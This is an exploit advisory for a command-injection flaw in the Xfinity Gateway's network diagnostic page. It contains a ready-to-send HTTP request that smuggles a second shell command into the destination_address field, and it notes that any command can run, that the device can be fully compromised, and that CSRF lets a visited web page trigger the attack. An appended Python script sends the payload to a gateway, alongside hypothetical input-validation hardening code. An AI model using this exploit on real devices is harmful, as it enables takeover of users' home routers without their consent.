Xfinity Gateway Remote Code Execution
Posted on 03 December 2016
# Exploit Title: Xfinity Gateway: Remote Code Execution
# Date: 12/2/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://xfinity.com
# Platform: php

The gateway's web interface page /network_diagnostic_tools.php has a "test connectivity" feature. Submitting it sends a POST request to /actionHandler/ajax_network_diagnostic_tools.php, and the destination_address parameter of that request is placed into an OS command without sanitization, so it is vulnerable to command injection.

PoC (replace attackerip with an address you control that the gateway can reach; Content-Length must match the body you actually send):

POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive

test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4

The injected "|| ping -c3 attackerip;" terminates the legitimate command and starts a second one. To confirm it ran, open Wireshark on the attacker host with the display filter "ip.dst == attackerip && icmp": the router sends three ICMP echo requests to attackerip, proving that the injected command executed. Note that "||" only runs the right-hand command when the command before it exits non-zero; if the pings do not arrive, use ";" as the separator instead. Any other command runs the same way, so the flaw can be leveraged to completely compromise the device.

The vulnerability is particularly dangerous because the application has no CSRF protection, as demonstrated in https://www.exploit-db.com/exploits/40853/, so the request can be triggered from a web page visited by a user on the gateway's LAN.
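The script below is an added example and not part of the original advisory. It builds and sends the PoC request described above, shows why the destination_address value turns into a second shell command, and contrasts it with a hardened handler that validates the parameter and never uses a shell. The "ping -c <count1> <destination_address>" shape of the command the gateway runs is an assumption, 192.0.2.10 is a constructed attacker address, and validate/argv helpers are hypothetical hardening code, not anything from the device.

```python
#!/usr/bin/env python3
"""Added example for the Xfinity Gateway test-connectivity command injection.

Not part of the original advisory. Assumptions (not stated on the page):
  - the gateway builds "ping -c <count1> <destination_address>" and hands it
    to a shell; vulnerable_shell_command() models that assumed shape,
  - 192.0.2.10 is a constructed attacker address (TEST-NET-1),
  - is_safe_destination()/build_ping_argv() are a hypothetical hardening,
    not code from the device.
"""
import http.client
import ipaddress
import re
import shlex
import sys
from urllib.parse import urlencode

HANDLER_PATH = "/actionHandler/ajax_network_diagnostic_tools.php"
SHELL_SEPARATORS = {";", "||", "&&", "|", "&"}


def build_injection_body(attacker_ip, host="www.comcast.net", count=4, separator="||"):
    """Form body from the PoC. urlencode() percent-encodes the shell
    metacharacters; PHP decodes them again before the value reaches the shell."""
    destination = f"{host} {separator} ping -c3 {attacker_ip}; "
    return urlencode({"test_connectivity": "true",
                      "destination_address": destination,
                      "count1": str(count)})


def send_poc(gateway, attacker_ip, separator="||", timeout=10):
    """POST the payload to the gateway (network action; http.client sets Content-Length)."""
    body = build_injection_body(attacker_ip, separator=separator)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": f"http://{gateway}/network_diagnostic_tools.php",
    }
    conn = http.client.HTTPConnection(gateway, 80, timeout=timeout)
    conn.request("POST", HANDLER_PATH, body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, data


def vulnerable_shell_command(destination, count):
    """Assumed shape of the command the handler runs: string interpolation into a shell line."""
    return f"ping -c {count} {destination}"


def shell_commands(cmdline):
    """Split a command line at ; || && | & the way a POSIX shell does and return
    one argv list per command, which is why the payload becomes a second command."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in SHELL_SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


# Hypothetical hardening: allow-list the parameter instead of escaping it.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def is_safe_destination(value):
    """True only for an IP address literal or a DNS hostname; spaces, quotes and
    shell metacharacters can never pass."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(value))


def build_ping_argv(destination, count):
    """Hardened form: validate both parameters and return an argv list for
    subprocess.run(argv) without a shell, so metacharacters are inert."""
    count = int(count)
    if not 1 <= count <= 10:
        raise ValueError("count1 out of range")
    if not is_safe_destination(destination):
        raise ValueError("destination_address is not a hostname or IP address")
    return ["ping", "-c", str(count), destination]


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} <gateway-ip> <attacker-ip>")
    status, data = send_poc(sys.argv[1], sys.argv[2])
    print(status, data[:200])
```

Run it as "python3 poc.py 10.0.0.1 <attacker-ip>" with a packet capture on the attacker host, as the advisory describes. shell_commands() is only there to make the mechanism visible: fed the assumed command line with the PoC value, it yields the legitimate ping followed by the injected one, while the same value fails is_safe_destination() and never reaches a shell in build_ping_argv().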